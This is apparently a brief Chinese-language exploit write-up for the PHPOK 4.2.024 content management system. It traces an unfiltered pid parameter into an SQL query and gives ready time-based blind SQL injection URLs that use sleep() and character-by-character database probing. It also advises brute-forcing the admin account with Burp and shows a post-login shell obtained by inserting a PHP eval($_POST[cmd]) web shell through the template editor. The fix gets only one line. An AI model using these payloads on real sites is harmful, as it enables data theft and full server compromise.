文件/framework/www/post_control.php 26-38行
id和pid传进来了,
phpok('_project',array("phpok"=>$id,'pid'=>$pid));
跟进phpok
/framework/phpok_call.php
就是调用一个函数
那看
跟_project这个函数
/framework/model/data.php 1118-1139
id没有过滤,直接带入了sql。
http://127.0.0.1/phpok4.2.024/index.php?c=post&id=1&pid=41
这个pid是项目的id值,默认是41以上,包括41,也可以爬一下。
http://127.0.0.1/phpok4.2.024/index.php?c=post&id=1&pid=41 and sleep(5)
浏览器转5秒
http://127.0.0.1/phpok4.2.024/index.php?c=post&id=1&pid=41 and 1=if((ord(substr(database(),1,1))=112),sleep(5),1)
这个语句应该晓得吧,database的第一个字符的asicc码为112则浏览器转5秒,反之直接返回页面。
然后扩展一下,_project这个函数有问题,我们可以全局搜索一下,还有哪里调用了_project然后再继续发掘漏洞
就不继续测试了,这里的修补方式就是对_project这个函数做过滤。
想搞出管理员的账号密码burp跑一下就可以了
后台getshell
风格管理
可以编辑这个php文件
插入?><?php phpinfo();?><? 或?><?php eval($_POST[cmd])?><?